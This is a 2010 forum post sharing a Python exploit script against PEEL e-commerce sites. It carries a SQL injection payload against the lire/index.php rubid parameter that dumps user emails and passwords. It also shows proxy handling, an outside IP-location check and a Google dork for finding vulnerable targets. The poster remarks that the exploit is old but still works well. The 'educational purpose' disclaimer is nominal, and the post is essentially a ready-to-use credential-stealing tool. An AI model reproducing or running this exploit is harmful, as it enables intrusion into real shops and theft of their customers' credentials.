hozarares Posted January 4, 2010 Report Posted January 4, 2010 #!/usr/bin/python# This was written for educational purpose only. Use it at your own risk.# Author will be not responsible for any damage!################################################################# # ## Vuln discovered by banjirian#import os, sys, time, re, urllib2, httplib, socketif sys.platform == 'linux' or sys.platform == 'linux2': clearing = 'clear'else: clearing = 'cls'os.system(clearing)proxy = "None"count = 0if len(sys.argv) < 2 or len(sys.argv) > 4: print "\n|---------------------------------------------------------------|" print "| b4ltazar[@]gmail[dot]com |" print "| 06/2009 PEEL e-commerce |" print "| Vuln discovered by banjirian |" print "| Usage: peel.py http://www.site.com/ |" print "| Visit Ljuska v2 :: Forums - Index page |" print "|---------------------------------------------------------------|\n" sys.exit(1)for arg in sys.argv: if arg == '-h': print "\n|-------------------------------------------------------------------------------|" print "| b4ltazar[@]gmail[dot]com |" print "| 06/2009 PEEL e-commerce |" print "| Vuln discovered by banjirian |" print "| Usage: peel.py www.site.com |" print "| Example: pell.py ACKSOFT |" print "| Visit Ljuska v2 :: Forums - Index page |" print "|-------------------------------------------------------------------------------|\n" sys.exit(1) elif arg == '-p': proxy = sys.argv[count+1] count += 1site = sys.argv[1]if site[:4] != "http": site = "http://"+siteif site[-1] != "/": site = site + "/"print "\n|---------------------------------------------------------------|"print "| b4ltazar[@]gmail[dot]com |"print "| 06/2009 PEEL e-commerce |"print "| Vuln discovered by banjirian |"print "| Visit Ljuska v2 :: Forums - Index page |"print "|---------------------------------------------------------------|\n"print "\n[-] %s" % time.strftime("%X")socket.setdefaulttimeout(20)try: if proxy != "None": print "[+] Proxy:",proxy print "\n[+] Testing Proxy..." pr = httplib.HTTPConnection(proxy) pr.connect() proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'}) proxyfier = urllib2.build_opener(proxy_handler) proxyfier.open("http://www.google.com") print print "\t[!] w00t!,w00t! Proxy: "+proxy+" Working" print else: print "[-] Proxy not given" print proxy_handler = urllib2.ProxyHandler()except(socket.timeout): print print "\t[-] Proxy Timed Out" print sys.exit(1)except(),msg: print msg print "\t[-] Proxy Failed" print sys.exit(1)try: url = "http://antionline.com/tools-and-toys/ip-locate/index.php?address="except(IndexError): print "[-] Wtf?"proxyfier = urllib2.build_opener(proxy_handler)proxy_check = proxyfier.open(url).readlines()for line in proxy_check: if re.search("<br><br>", line): line = line.replace("</b>","").replace('<br>',"").replace('<b>',"") print "\n[!]",line,"\n" print "[+] Target:",siteprint "[+] Exploiting...\n"try: check = proxyfier.open(site+'lire/index.php?rubid=1+union+all+select+1,concat_ws(char(58),email,mot_passe,0x62616c74617a6172),3+from+peel_utilisateurs--').read() if re.findall("baltazar", check): print "[!] w00t!,w00t!: ",site+'lire/index.php?rubid=1+union+all+select+1,concat_ws(char(58),email,mot_passe),3+from+peel_utilisateurs--' print else: print "[-] Can't exploit :(" printexcept(urllib2.HTTPError): passexcept(KeyboardInterrupt, SystemExit): pass print "[!] Use this google dork for finding targets"print "\tinurl:lire/index.php?rubid=\n"print "\n[-] %s" % time.strftime("%X")####################################################Mai vechi dar inca merge foarte bine ...... Quote